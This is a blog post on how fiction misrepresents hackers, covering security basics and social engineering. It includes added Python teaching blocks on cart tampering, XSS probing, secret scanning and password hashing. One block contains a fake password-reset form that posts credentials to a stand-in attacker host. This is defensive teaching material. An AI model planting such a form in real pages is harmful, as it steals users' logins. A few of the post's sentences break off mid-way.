January 24, 2021
Fiction and reality tend to differ in most respects, be it relationships, secret agents, doctors, you name it. But
hackers are by far one of the most misrepresented subjects in media of all forms.
Take this example:
A loud crunch echoed throughout the Dungeon as EtherLord cracked his knuckles. The Dungeon,
his underground hacking lab, was illuminated only by the glowing lights of his three monitors. He opened a
console window, hunched over his keyboard, and began typing with a fury that would have made Beethoven envious.
It was taking too long, so he conjured up another terminal, and another, and another. Code soared across the
screen at a record pace. Then he was in. It had taken him three minutes to crack the power grid's security.
With the next keystroke, the entire east coast would be sitting in the dark. EtherLord smiled. Click.
Pretty dramatic, and pretty exciting. It's also pretty unrealistic. Scenes like this are all over the media.
They're in movies and books, and it's even how the news depicts hackers, but the truth is, hacking is nothing
like that. Unfortunately, as interesting as it sounds (and is), hacking (and coding in general) is pretty
boring to watch.
Let's take a look at another scenario involving a malicious hacker:
Todd, known to his friends on IRC as T-Lulz1337, just finished running his vulnerability
scanner against random-site.com. It had discovered a few potential attack vectors, but it would be a manual
process now to evaluate them and to craft effective attacks. After three hours of playing around and suffering
the atrocious lag caused by all the proxies he was going through to cover his tracks, he had found a promising
persistent cross-site scripting attack vector. Todd spent the next two days crafting a script that would inject
code appearing to be an innocent password-reset form that would blend in with the rest of Random Site. With the
next click, his fake form would become part of the page. In a few weeks, assuming nobody notices it, perhaps he
will have collected enough credentials to make an enticing sales package.
This scenario is more realistic, but not terribly exciting to watch on a big screen, even when you speed it up
with a montage. Scenes like this don't hold up against a teenager hacking into the power grid in a few seconds
and cutting power to the entire block just to prove a point (yet still having an internet connection somehow
afterward), or a man hacking a high-security government system while being pleasured by a stranger, or an agency
fighting off a cyber attack and speeding up the process by having two people operate the same keyboard.
The combination of ignorance and the desire to create exciting drama leads to the unrealistic depiction of
hackers and IT security in general. So what is it like in reality?
The truth is, hacking is just a form of software development combined with quality assurance. It's a process
which involves hours of scanning, searching, reading code, and trial and error in order to find a bug or
vulnerability, followed potentially by hours of code writing or other preparations.
In movies, hackers are cool, beautiful people, sometimes with black leather trench coats and sunglasses. They're
impressive demigods who use a keyboard to mold the world to fit their needs. For whatever reason, the news
thinks all hackers sit in a dark room wearing black hoodies with the hood up like some sort of cyber grim
In reality, hackers are mostly just regular people and aren't necessarily even software developers. Sometimes
they're pretty clever, and sometimes they just know how to use tools which some clever person built. In the
hacking community, a person who has no skill or knowledge of their own and who just operates pre-made tools is
referred to as a "script kiddie". The grand majority of people who call themselves hackers fall into this
Hackers or security professionals often categorize themselves as either black or white hat hackers (sometimes
they invent other-colored hats as well because people don't like dichotomies). The terms aren't really
meaningful or binding in any way but are basically labels to indicate whether a person is considered malicious
(black hat) or not (white hat).
It may at first seem contradictory to speak of a non-malicious hacker, but it's a very common and important
profession. Companies employ security engineers or hire security firms to perform penetration tests (tests to
see whether a system can be penetrated, i.e. hacked) on their applications, so that vulnerable code is found and
patched before a malicious user finds it. Some independent hackers find vulnerabilities and report them to the
owners for the sake of improving the quality of the internet or software in general; the usual arrangement today
is coordinated disclosure, where the finder gives the vendor a fixed period to ship a patch before publishing.
Some instead practice "full disclosure", publishing their findings immediately and without restriction, forcing
application owners to address the issue while also letting potential victims know as much as the attackers do.
Simply put, a vulnerability is a weakness that allows a system to be attacked, hacked, or otherwise exploited. The
route an attacker takes to reach it (a login form, a file upload, an exposed network service) is often called the
attack vector, though the two terms get used interchangeably. But that's still pretty abstract. What constitutes
a vulnerability?
Security can be broken down into three categories: confidentiality, integrity, and availability. These three
qualities are often referred to as the CIA triad. They're the three holy virtues of security, and for each,
there is a negative counterpart or sin.
Confidentiality refers to the protection of information from unauthorized access. A customer's personal data,
for example, such as credit card numbers, home address, email address, etc. should remain private. The failure
of confidentiality is referred to as disclosure. Such failures could be the result of incorrect or missing
access controls, leaked passwords, excessive logging, etc.
Integrity describes the correctness of data. This is particularly important in the case of financial records.
Records of transactions need to be accurate and consistent, and only authorized users should be able to modify
them, and only in controlled ways. A failure of integrity is referred to as alteration (or destruction). A simple
example: a random user can change the price of a product in their shopping cart, because the server trusts the
price the browser sends back instead of looking it up itself.
Availability refers to the uptime of a system. An application and its information should be running and
accessible. A failure of availability is referred to as denial. The DDoS attacks (distributed denial of service)
so often described in the media attack availability. A denial of service attack typically aims to overload a
system either through sheer volume (for example, traffic from thousands of machines controlled by a botnet) or by
targeting particularly slow and expensive operations, where a small request costs the server far more than it
costs the attacker.
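The shopping-cart example above, worked out as an added example (this is not code from the original post): a checkout that trusts the price the client posts back, beside one that re-derives it from server-side state, plus the signing pattern for the case where cart state genuinely has to round-trip through the browser. The shop, its SKUs, prices and SERVER_KEY are constructed for the demo.

```python
import hashlib
import hmac
import json
import secrets
from decimal import Decimal

# Added example (not code from the original post). The shop, its SKUs and prices
# are constructed for this demo; SERVER_KEY stands in for a per-deployment secret.
CATALOG = {
    "sku-100": Decimal("49.99"),
    "sku-200": Decimal("5.00"),
}
SERVER_KEY = secrets.token_bytes(32)


def total_vulnerable(cart):
    """Integrity failure: the server trusts the price the browser sent back.

    `cart` is whatever JSON the client posted, e.g.
    [{"sku": "sku-100", "qty": 1, "price": "0.01"}]
    """
    return sum(
        (Decimal(str(item["price"])) * item["qty"] for item in cart),
        Decimal("0"),
    )


def total_hardened(cart):
    """Re-derive every price from server-side state; the client only chooses
    what to buy and how many, and even that is validated."""
    total = Decimal("0")
    for item in cart:
        sku = item.get("sku")
        if sku not in CATALOG:
            raise ValueError(f"unknown sku: {sku!r}")
        qty = item.get("qty")
        # bool is a subclass of int, so exclude it explicitly
        if isinstance(qty, bool) or not isinstance(qty, int) or not 1 <= qty <= 100:
            raise ValueError(f"bad quantity for {sku}: {qty!r}")
        total += CATALOG[sku] * qty
    return total


def seal_cart(cart):
    """If cart state must round-trip through the client (cookie, hidden field),
    sign it so any edit is detected. Canonical JSON keeps the MAC stable."""
    body = json.dumps(cart, sort_keys=True, separators=(",", ":"))
    tag = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def open_cart(sealed):
    """Verify the signature before trusting anything inside."""
    body, sep, tag = sealed.rpartition(".")
    if not sep:
        raise ValueError("malformed sealed cart")
    expected = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("cart signature mismatch: tampered or forged")
    return json.loads(body)


if __name__ == "__main__":
    tampered = [{"sku": "sku-100", "qty": 1, "price": "0.01"},
                {"sku": "sku-200", "qty": -3, "price": "5.00"}]
    print("vulnerable total:", total_vulnerable(tampered))  # -14.99: a 'refund' on top of the goods
    honest = [{"sku": "sku-100", "qty": 1}]
    print("hardened total:", total_hardened(honest))        # 49.99
    sealed = seal_cart(honest)
    print("sealed cart:", sealed)
    try:
        open_cart(sealed.replace('"qty":1', '"qty":100'))
    except ValueError as e:
        print("tamper detected:", e)
```

The negative quantity in the tampered cart is the second half of the same integrity problem: validating who may edit data is not enough if the values themselves are never checked.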
In QA, and likewise in hacking, there are two basic styles of testing: black-box and white-box. When the
application's code and inner workings are a mystery to the tester, it's black-box testing; when the tester has
the source code (and often documentation and credentials as well), it's white-box testing. Black-box is how most
attackers approach a target unless they have insider information, are attacking open-source software, or were
hired to test it.
The methods for identifying possible attack vectors vary with those two styles. With access to the code, you can
search it for functions or operations known to be insecure or frequently mishandled. Testing a black box, one
might begin by requesting well-known paths (e.g. appending /wp-admin to the URL to see if it's a WordPress blog
with an admin panel), or by submitting forms and modifying URL parameters and then examining the returned page
source to see whether the input was echoed anywhere, and if so whether the characters that matter to HTML (angle
brackets, quotes) came back intact or encoded. For desktop applications, an attacker may decompile the program or
run it under tools such as a debugger or hex editor to examine its behavior.
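As an added example (not code from the original post), the echo check described above together with the stored-XSS scenario from earlier on this page: a page that concatenates a saved comment into its HTML beside one that escapes it, a canary probe of the kind a black-box tester submits, and a classifier that reports whether the probe came back raw, escaped, or filtered. The page template, the fake password-reset form and the attacker.example URL are constructed placeholders.

```python
import html
import re
import secrets

# Added example (not code from the original post). The two render functions stand
# in for the comment page of a site like random-site.com; payload and canary are
# constructed for the demo.

PAGE = "<html><body><h1>Comments</h1><div class='c'>{}</div></body></html>"


def render_vulnerable(comment):
    """Stored-XSS pattern: the saved comment is concatenated straight into HTML."""
    return PAGE.format(comment)


def render_hardened(comment):
    """Same page, with the comment escaped for an HTML text context."""
    return PAGE.format(html.escape(comment, quote=True))


def make_canary():
    """A probe string for black-box testing: a unique token (so we find *our*
    input and not someone else's) followed by the characters that matter to HTML."""
    return f"zz{secrets.token_hex(4)}<\"'zz"


def strip_metachars(s):
    return re.sub(r"[<>\"']", "", s)


def classify_reflection(body, canary):
    """What came back? This is the check behind 'see if the input was echoed'."""
    if canary in body:
        return "reflected-raw"        # metacharacters survived: injection candidate
    if html.escape(canary, quote=True) in body:
        return "reflected-escaped"    # echoed, but neutralised for this context
    if strip_metachars(canary) in body:
        return "reflected-filtered"   # echoed with the dangerous characters removed
    return "not-reflected"


def probe(render, canary=None):
    """Submit the canary through the app and classify the page it produces."""
    canary = canary or make_canary()
    return classify_reflection(render(canary), canary)


# The fake password-reset form from the scenario (constructed; the action URL is
# a placeholder). Against the vulnerable renderer it becomes part of the page;
# against the hardened one it is displayed as inert text.
FAKE_RESET_FORM = (
    "<form action='https://attacker.example/collect' method='post'>"
    "Session expired, please re-enter your password: "
    "<input name='u'><input name='p' type='password'><button>Reset</button></form>"
)


def payload_survives(render, payload=FAKE_RESET_FORM):
    return payload in render(payload)


if __name__ == "__main__":
    print("vulnerable:", probe(render_vulnerable), payload_survives(render_vulnerable))
    print("hardened:  ", probe(render_hardened), payload_survives(render_hardened))
```

A real engagement runs the same probe against every input that is stored or reflected, and repeats it for the other output contexts (attribute values, JavaScript strings, URLs), since escaping that is correct for one context is not sufficient for another.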
Most researchers or attackers use tools to simplify and speed up the process. These are not magic auto-hack tools
that allow you to hack any system in a matter of seconds. Real-life security tools include vulnerability scanners
that look for common vulnerabilities, port scanners which check for machines that may be accessible to the
public and may be running certain types of software, and brute forcers which can be used to crack passwords
or login forms by trying many combinations.
There have been several major vulnerabilities in the past few years which were found by clever security
researchers who really understood the code they were exploiting. The OpenSSL vulnerability Heartbleed, the bash
vulnerability Shellshock, and the microprocessor vulnerabilities Meltdown and Spectre are good examples with
catchy names. Famous examples like these are actually fairly uncommon.
Fiction would lead you to believe that hackers are computer geniuses performing amazing heist-like feats to either
stick it to "the man" or to destroy the world. The news would have you believe that every time you open your
browser, hackers are trying to enter your home to steal your identity. Lawmakers seem to believe that cookies
are evil digital pastries that give hackers a way to infiltrate your machine. None of this is really true. The
truth is, most major breaches are the result of social engineering and human error. The most vulnerable part of
every system is the human.
Social engineering is the process of exploiting a system through human interaction, particularly using
psychological manipulation to trick users into making security mistakes or disclosing sensitive information.
Phishing is probably the most common example: attackers send either mass emails or messages claiming to be
something they're not, often with misleading links to fake websites, or targeted messages (spear phishing) that
capitalize on information already known about you. Trickery, and the exploitation of laziness and trust, are how
the majority of major breaches occur.
I once witnessed someone take full control of a popular website by simply calling the hosting company and saying
that he forgot his password. The company, being not entirely incompetent, requested proof of identification, so
the hacker created a fake ID card (just the image of one, not even an actual card), and the hosting service
accepted it without further validation or verification. For an entire week, the site belonged to him and the
real owners were blocked.
It's incredible how readily people will share information with someone who simply asks and acts like they belong.
This is how Seven Sinclair, the protagonist of my novel, A Fatal Exception,
typically obtains information to help him solve cases. This also includes physical access to things. Most
offices have locks, but if you saw someone with her hands full heading for the door, would you let it close on
her? Once you have physical access to an internal network or computers, it's easy to wreak havoc.
One of the biggest mistakes developers make is to leak passwords, API keys, and other critical data like user
email addresses or other personally identifiable information. Hard-coded API keys (basically internal passwords)
are sadly very common, and anyone who obtains a copy of the code (or finds it in a public GitHub repository,
where a key deleted from the current version usually still sits in the commit history) has access to internal
systems. Overly verbose logging may be useful for debugging (though if there's too much information, it's of
questionable use), but it's also pretty useful for intruders. All it would take is for one corporate laptop with
poorly-secured VPN access to be stolen, and an attacker would have access to a plethora of corporate and customer
data.
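An added example (not code from the original post) of the check a practitioner would run against the two problems just described: a small scanner that flags hard-coded keys in source lines by shape and by entropy, and a redaction filter that masks the same values before they reach a log. The source and log lines are constructed; the key-like strings are made up, apart from AKIAIOSFODNN7EXAMPLE, which is the placeholder access key id from AWS's own documentation.

```python
import math
import re
from collections import Counter

# Added example (not code from the original post). The lines below are
# constructed: the key-like values are made-up strings in the right shape,
# and AKIAIOSFODNN7EXAMPLE is the placeholder access key id used in AWS's docs.
SAMPLE_LINES = [
    'API_KEY = "sk_live_Xq9zL2mR7bT4vWn8pK3yH6dJ"',                                 # hard-coded key
    'aws_access_key_id = AKIAIOSFODNN7EXAMPLE',                                     # committed config
    'password = "changeme-changeme"',                                               # low-entropy placeholder
    'DEBUG auth: session issued user=alice token=Mq7vX2pL9zTb4WnR8kY3sH6dJ0cF5gQ1',  # verbose log line
    'return render(template, user=user)',                                           # clean
]

PATTERNS = {
    # Well-known fixed shapes first: these need no entropy test.
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    # Generic "name = value" assignments; the value is group 2.
    "generic_assignment": re.compile(
        r"(?i)(api[_-]?key|secret|token|passw(?:or)?d)\s*[:=]\s*['\"]?([A-Za-z0-9_\-./+=]{12,})"
    ),
}
ENTROPY_THRESHOLD = 3.5   # bits per character; skips placeholders, keeps real keys


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_line(line, lineno=0):
    findings = []
    for kind, pat in PATTERNS.items():
        for m in pat.finditer(line):
            value = m.group(2) if kind == "generic_assignment" else m.group(0)
            # "password = 'changeme'"-style placeholders have low entropy; a real
            # key or token does not. Caveat: a weak human-chosen password slips
            # past this test too, which is why the fixed-shape patterns don't use it.
            if kind == "generic_assignment" and shannon_entropy(value) < ENTROPY_THRESHOLD:
                continue
            findings.append((lineno, kind, value))
    return findings


def scan(lines):
    """Scan source or log lines; returns (line_number, kind, value) triples."""
    out = []
    for i, line in enumerate(lines, start=1):
        out.extend(scan_line(line, i))
    return out


def redact(line):
    """Mask detected secrets, keeping a 4-character tail for correlation. Suitable
    as a filter in front of a log sink so debug logging cannot leak credentials."""
    for _, _, value in scan_line(line):
        line = line.replace(value, "***" + value[-4:])
    return line


if __name__ == "__main__":
    for lineno, kind, value in scan(SAMPLE_LINES):
        print(f"line {lineno}: {kind}: {value[:6]}...")
    print(redact(SAMPLE_LINES[3]))
```

Run the scanner as a pre-commit hook over the whole history, not just the working tree, and treat any key it finds as compromised and rotate it: deleting the line does not unpublish it.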
Insecurely stored passwords (e.g. as plaintext) make possible all the massive breaches you constantly hear about.
Enormous lists of millions of usernames and passwords are exported and publicized, and this, combined with the
fact that most people reuse their passwords, makes identity theft easy. Identities are stolen,
not through the technical prowess of hackers, but rather through the technical incompetence of developers and
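An added example (not code from the original post) contrasting the plaintext storage described above with salted, slow hashing using PBKDF2-HMAC-SHA256 from Python's standard library. The user and password are constructed; the iteration count follows OWASP's published minimum for PBKDF2 and should be re-checked against current guidance (argon2id or scrypt are preferable where a library for them is available).

```python
import base64
import hashlib
import hmac
import os

# Added example (not code from the original post). Users and passwords here are
# constructed. PBKDF2-HMAC-SHA256 is used because it ships in Python's stdlib;
# 600,000 iterations is OWASP's published minimum for it (an assumption to
# re-check against current guidance).
PBKDF2_ITERATIONS = 600_000
ALG = "pbkdf2_sha256"


def store_plaintext(db, user, password):
    """The breach-dump way: whoever copies the table has every password and can
    try each one on every other site the user has an account on."""
    db[user] = password


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Salted, slow hash. The record carries its own parameters so they can be raised later."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return "$".join([ALG, str(iterations),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(dk).decode("ascii")])


def verify_password(password, record):
    alg, iters, salt_b64, dk_b64 = record.split("$")
    if alg != ALG:
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iters), dklen=len(expected))
    # Constant-time comparison: don't leak how many bytes matched.
    return hmac.compare_digest(dk, expected)


def needs_rehash(record):
    """True if the stored record uses fewer iterations than current policy; call
    hash_password again on the next successful login to upgrade it in place."""
    alg, iters, _, _ = record.split("$")
    return alg != ALG or int(iters) < PBKDF2_ITERATIONS


if __name__ == "__main__":
    leaked_plain, hashed = {}, {}
    store_plaintext(leaked_plain, "alice", "Summer2020!")
    hashed["alice"] = hash_password("Summer2020!")
    print("plaintext table leaks:", leaked_plain)
    print("hashed table leaks:   ", hashed)
    print("login ok: ", verify_password("Summer2020!", hashed["alice"]))
    print("login bad:", verify_password("summer2020!", hashed["alice"]))
    # Same password, two different records: a leaked hash from one site can't be
    # matched against another by simple equality, unlike a plaintext dump.
    print("records differ:", hash_password("Summer2020!") != hashed["alice"])
```

Hashing does not stop an attacker with the dump from guessing weak passwords offline; it makes each guess cost real CPU time and forces the work to be repeated per user because of the salt, which is what turns "millions of passwords" into "a few of the worst ones".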
As enticing as it is to make hackers out as digital magicians, writers need to remember that they're just people.
While it's okay to use creative license for some dramatic exaggeration, don't get carried away, and do your
research. It's unrealistic (and disheartening) to expect to become a security expert yourself, but there are
people who would be happy to answer questions. Search for popular hacking communities online and ask for advice
in their forums. Join any of the numerous hacking and security communities on Reddit and ask for tips or a
reality check. Post a question on Stack Overflow or the Information Security Stack Exchange.
And please, avoid scare tactics. While it's true that more and more things are connected to the web as the years
go by, and science fiction helps us to keep a healthy concern for the dangers of new technology, exaggerated and
unrealistic portrayals do more harm than good.